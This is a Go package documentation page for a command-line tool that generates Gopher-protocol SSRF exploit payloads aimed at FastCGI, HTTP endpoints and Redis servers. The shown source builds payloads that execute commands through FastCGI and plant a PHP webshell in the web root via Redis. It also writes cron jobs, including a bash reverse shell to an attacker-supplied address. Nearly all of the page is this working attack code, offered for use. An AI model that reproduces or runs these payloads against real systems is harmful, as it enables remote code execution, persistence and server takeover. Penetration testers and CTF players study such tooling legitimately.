Documentation ¶
Index ¶
- Variables
- func GenGopherExpByListen(targetAddr string, port int, noQuit bool) (string, error)
- func GopherFastCGIExp(addr string, cmd, filename string) (string, error)
- func GopherHTTPPostExp(addr string, uri string, datas map[string]string) (string, error)
- func GopherHTTPUploadExp(addr string, uri string, datas map[string]string) (string, error)
- func GopherRedisWriteExp(addr, path, name, data string) (string, error)
- func QueryEscape(r string, count int) string
Constants ¶
This section is empty.
Variables ¶
View Source
var Cmd = &cli.Command{ Category: "Web", Name: "gopher", Usage: "Generate Gopher Exp", Flags: []cli.Flag{ urlencodeFlag, }, Commands: []*cli.Command{ { Category: "Other", Name: "fastcgi", Aliases: []string{"fcgi"}, Usage: "FastCGI", Flags: []cli.Flag{ targetAddrFlag, filenameFlag, &cli.StringFlag{ Name: "command", Aliases: []string{"c"}, Value: "id", Usage: "Command", }, }, Action: func(c *cli.Context) (err error) { filename := c.String("filename") if filename == "" { filename = "/usr/share/php/PEAR.php" } r, err := GopherFastCGIExp(c.String("target"), c.String("command"), filename) if err != nil { return err } r = QueryEscape(r, c.Int("urlencode")) _, err = fmt.Println(r) return }, }, { Category: "HTTP", Name: "post", Usage: "HTTP Post", Flags: []cli.Flag{ targetURLFlag, &cli.StringMapFlag{ Name: "data", Aliases: []string{"d"}, Usage: "Post data. key=value", Required: true, }, }, Action: func(c *cli.Context) (err error) { target := c.String("target") if !strings.HasPrefix(target, "http") { target = fmt.Sprintf("http://%s", target) } targetURL, err := url.Parse(target) if err != nil { return err } r, err := GopherHTTPPostExp(targetURL.Host, targetURL.RequestURI(), c.StringMap("data")) if err != nil { return err } r = QueryEscape(r, c.Int("urlencode")) _, err = fmt.Println(r) return }, }, { Category: "HTTP", Name: "upload", Usage: "HTTP Upload", Flags: []cli.Flag{ targetURLFlag, &cli.StringMapFlag{ Name: "data", Aliases: []string{"d"}, Usage: "Post data/upload file. key=value or name=content", Required: true, }, }, Action: func(c *cli.Context) (err error) { target := c.String("target") if !strings.HasPrefix(target, "http") { target = fmt.Sprintf("http://%s", target) } targetURL, err := url.Parse(target) if err != nil { return err } r, err := GopherHTTPUploadExp(targetURL.Host, targetURL.RequestURI(), c.StringMap("data")) if err != nil { return err } r = QueryEscape(r, c.Int("urlencode")) _, err = fmt.Println(r) return }, }, { Category: "Redis", Name: "listen", Usage: "By Listen redis-cli command", Flags: []cli.Flag{ &cli.IntFlag{ Name: "port", Aliases: []string{"p"}, Value: 9527, Usage: "Listen Port", }, &cli.IntFlag{ Name: "times", Aliases: []string{"t"}, Value: 1, Usage: "Number of accept times", }, &cli.BoolFlag{ Name: "no-quit", Aliases: []string{"no"}, Value: true, Usage: "Redis reply 'quit' at the end", }, }, Action: func(c *cli.Context) (err error) { if c.NArg() < 1 { return fmt.Errorf("not found arg [addr]") } r, err := GenGopherExpByListen(c.String("target"), c.Int("port"), !c.Bool("no-quit")) if err != nil { return err } for i := 0; i < c.Int("urlencode"); i++ { r = url.QueryEscape(r) } _, err = fmt.Println(r) return }, }, { Category: "Redis", Name: "write", Usage: "Redis Write File", Flags: redisFlags, Action: func(c *cli.Context) (err error) { target := c.String("target") filename := c.String("filename") filepath := c.String("filepath") content := c.String("content") if filename == "" { filename = "root" } if filepath == "" { filepath = "/var/www/html/" } if content == "" { content = "Gopher Exp Redis Write File" } r, err := GopherRedisWriteExp(target, filepath, filename, content) if err != nil { return err } r = QueryEscape(r, c.Int("urlencode")) _, err = fmt.Println(r) return }, }, { Category: "Redis", Name: "webshell", Usage: "Redis Write Webshell", Flags: redisFlags, Action: func(c *cli.Context) (err error) { target := c.String("target") filename := c.String("filename") filepath := c.String("filepath") content := c.String("content") if filename == "" { filename = "virzz.php" } if filepath == "" { filepath = "/var/www/html/" } if content == "" { content = "\r\n<?php system($_GET['cmd']);?>\r\n" } r, err := GopherRedisWriteExp(target, filepath, filename, content) if err != nil { return err } r = QueryEscape(r, c.Int("urlencode")) _, err = fmt.Println(r) return }, }, { Category: "Redis", Name: "write", Usage: "Redis Write Crontab", Flags: redisFlags, Action: func(c *cli.Context) (err error) { target := c.String("target") filename := c.String("filename") filepath := c.String("filepath") content := c.String("content") if filename == "" { filename = "root" } if filepath == "" { filepath = "/var/spool/cron/" } if content == "" { content = fmt.Sprintf("\n\n\n\n*/1 * * * * sh -c \"%s\"\n\n\n\n", c.String("crontab")) } r, err := GopherRedisWriteExp(target, filepath, filename, content) if err != nil { return err } r = QueryEscape(r, c.Int("urlencode")) _, err = fmt.Println(r) return }, }, { Category: "Redis", Name: "reverse", Usage: "Redis Write File", Flags: []cli.Flag{ targetAddrFlag, filenameFlag, filepathFlag, &cli.StringFlag{ Name: "reverse", Aliases: []string{"r"}, Usage: "Write Crontab Reverse shell addr", Action: func(c *cli.Context, target string) error { return utils.ValidFlag(target, "tcp_addr") }, }, }, Action: func(c *cli.Context) (err error) { target := c.String("target") filename := c.String("filename") filepath := c.String("filepath") if filename == "" { filename = "root" } if filepath == "" { filepath = "/var/spool/cron/" } addr, _ := net.ResolveTCPAddr("tcp", c.String("reverse")) content := fmt.Sprintf("\n\n\n\n*/1 * * * * sh -c \"bash -i >& /dev/tcp/%s/%d 0>&1\"\n\n\n\n", addr.IP.String(), addr.Port) r, err := GopherRedisWriteExp(target, filepath, filename, content) if err != nil { return err } r = QueryEscape(r, c.Int("urlencode")) _, err = fmt.Println(r) return }, }, }, }
Functions ¶
func GenGopherExpByListen ¶ added in v0.1.6
通过监听流量生成 gopher exp
func GopherFastCGIExp ¶ added in v0.1.6
GopherFastCGIExp Genrate the FASTCGI Exp For Gopher.
func GopherHTTPPostExp ¶ added in v0.1.6
GopherHTTPPostExp Genrate the Http Post Exp For Gopher.
func GopherHTTPUploadExp ¶ added in v0.1.6
GopherHTTPUploadExp Genrate the Http Upload Exp For Gopher.
func GopherRedisWriteExp ¶ added in v0.1.6
func QueryEscape ¶ added in v0.1.6
Types ¶
This section is empty.
Click to show internal directories.
Click to hide internal directories.